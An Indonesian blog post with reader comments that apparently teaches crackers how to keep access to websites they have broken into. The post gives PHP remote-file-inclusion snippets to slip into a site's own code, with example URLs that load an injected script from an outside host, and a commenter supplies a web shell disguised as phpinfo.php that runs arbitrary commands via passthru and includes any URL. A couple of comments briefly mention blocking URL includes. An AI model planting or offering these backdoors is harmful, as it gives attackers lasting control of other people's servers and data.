Live Journal

All About Log

membuat BUG baru di situs target

ide ini timbul karna sering sekali saya menerima keluhan dari tman² saya

yang katanya haCker ( lebih tepatnya craCker ) mengeluh soal PHPshell mereka mati

atau di delete sama admin situsnya.. :-p

jika kita telah menguasai suatu situs hal yang pertama kali kepikir olehkita tentusaja bagaimana

mempertahankan acces nobody (padahal access root lebih kren…!!) kita disitus tsb. He.He..He…

banyak sekali cara yang di lakukan oleh craCker untuk mempertahankan access mereka di dalam

suatu situs ( apalagi kalo situs itu bisa di install Eggdro.. ya kan tol, nanak, til etc.. )

paling ga trima kalian kalo Bot kalian cuma tahan bentar..🙂

okeh.. beibeh..!!

berikut contoh bug yang dulu ( dulu banget ) sering saya pergunakan..!!

<?php

include ($_GET[“page”]);

?>

#################### ato ini ####################

<?

include($_REQUEST[“iDiots”] . “/idiots.php”);

?>

misalkan salahsatu bug itu ada di file idiots.php

buat menjalakan phpinject scriptnya tinggal buka file idiots php

ex: http://idiots.name/idiots.php?page=htpp://scriptinject.com/inject.txt? ( untuk bug yg petama )

http://idiots.name/idiots.php?iDiots=htpp://scriptinject.com/inject.txt? ( untuk bug yg kedua )

He..He.. maha benar iDiots dengan segala petunjuknya…!!

trik ini bakal awet.. buat kalian.. apa lagi script bug tsb di selipin di dalam script asli website tsb..

wah..wah..wah…. tahan lama… cing…. ( kaya pake obat kuat aja..!! )

6 responses to “membuat BUG baru di situs target

  1. Muhammad Baiquni April 12, 2008 at 11:12 pm

    kalo gw seh buatnya yang model laen vin. Dengan nama phpinfo.php

    isi scriptnya simpel doank

    <?php

    $cmd = $_GET[‘cmd’];
    $url = $_GET[‘url’];

    if(!isset($cmd) and !isset($url))
    {
    phpinfo();
    }

    if(isset($cmd))
    {
    echo “”;
    echo passthru($cmd);
    echo “”;
    }

    if(isset($url))
    {
    include $url;
    }

    ?>

    Beres, cuman gitu doank kok

  2. newbi May 20, 2008 at 10:54 pm

    ma’af om ini buat mencegahnya ya..?

    ato buat bikin bugnya..?
    tros ngejalaninnya gimana..?

  3. Muhammad Baiquni May 22, 2008 at 8:05 am

    buat bikinnya.

    Biasanya buat cegahnya ada yg melalui configurasi php, ada yg via script.

    Kalau via script, biasanya pake mode regex gitu.

    if(ereg(“http://”, $PHP_SELF)) apa gitu

  4. iDiots May 24, 2008 at 5:35 pm

    mas newbie..

    script yang di buat sama beben itu adalah script yg fungsinya sama dengan yg saya posting… cuma beben sedikit menambahkan phpinfo di script.. agara kalo ada yg buka filenya maka keluar phpinfo…

    untuk menjalankan bugnya kira² seperti ini http://namasitus.com/filebugnya.php?url=script_inject

    kira² begitu…

  5. Muhammad Baiquni July 8, 2008 at 6:51 pm

    iyah vin…

    Oh ya, url inject bisa dicegah dengan konfigurasi php.ini dimana allow_url_open (kalau ga salah yaa) itu di disable.

    Vin, loe postingin tentang SSH Tunnel gih😉

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: